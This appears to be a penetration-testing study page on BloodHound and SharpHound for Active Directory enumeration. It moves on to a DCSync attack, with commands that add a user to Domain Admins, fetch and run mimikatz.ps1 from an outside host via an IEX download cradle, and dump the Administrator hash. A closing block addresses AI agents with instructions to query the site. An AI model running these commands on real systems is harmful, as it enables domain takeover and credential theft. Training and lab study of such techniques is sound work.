# Bloodhound

## Overview

**Bloodhound** works the same way that [ldapdomaindump ](/active-directory/post-compromise-enumeration/ldapdomaindump.md)but it also collects data using Kerberos tickets and SMB sessions.&#x20;

Bloodhound allows for better visualization of attack paths, misconfigurations and potential privilege escalation paths.

<figure><img src="/files/Ev6bEn7FAHrsg8ma9jNQ" alt=""><figcaption></figcaption></figure>

## Domain Enumeration

```bash
sudo neo4j console
```

```bash
sudo bloodhound
sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c all
```

Upload the dumped files into the **Bloodhound** GUI

## Sharphound

If you don't have valid AD credentials and only an open shell you can run **sharphound.exe** to collect the data

{% hint style="danger" %}
This is very noisy so it should only be ran if you don't mind the noise
{% endhint %}

```
SharpHound.exe -c All
```

## Methodology

* Mark all pwned machines&#x20;
* Check **Reachable High Value Targets**
  * Essentially checks if that one machine could compromise the entire domain
* Check **Inbound Control Rights**
  * What can account/gorups can control this object
* Check  **Outbound Control Rights (First Degree Object Control)**
  * What objects can our compromised machine control

## DCSync/GetChangesAll

<figure><img src="/files/5RX9b59KdlDDkUNWRhdg" alt=""><figcaption></figcaption></figure>

If you have GetChanges and GetChangesAll privileges you can perform a dcsync attack. This attack abuses dcsync and the way it works with syncing domain controllers together to make sure that they both have the most up to date data. This means that we can extract all of the NTLM hashes by requesting a dcsync with the domain controller.

Add yourself to the Domain service accounts

```
 net group "Domain Admins" itmanager /add /domain
```

[Amsi bypass](/post-exploitation/av-evasion/bypassing-amsi.md) then use mimikatz

```
IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')
```

Grab domain admin hash

```
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/active-directory/post-compromise-enumeration/bloodhound.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.